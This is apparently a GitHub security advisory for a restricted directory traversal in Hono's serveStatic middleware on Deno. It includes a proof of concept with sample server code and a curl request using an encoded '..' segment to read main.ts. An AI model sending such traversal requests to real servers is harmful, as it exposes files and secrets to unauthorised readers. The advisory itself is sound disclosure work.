GHSA-3mpf-rcc7-5347
Hono vulnerable to Restricted Directory Traversal in serveStatic with deno
Details
### Summary
When using serveStatic with deno, it is possible to directory traverse where main.ts is located.
My environment is configured as per this tutorial https://hono.dev/getting-started/deno
### PoC
```bash $ tree . ├── deno.json ├── deno.lock ├── main.ts ├── README.md └── static └── a.txt ```
source
```jsx import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts' import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'
const app = new Hono() app.use('/static/*', serveStatic({ root: './' }))
Deno.serve(app.fetch) ```
request
```bash curl localhost:8000/static/%2e%2e/main.ts ```
response is content of main.ts
### Impact
Unexpected files are retrieved.
Are you affected?
Enter the version of the package you're using.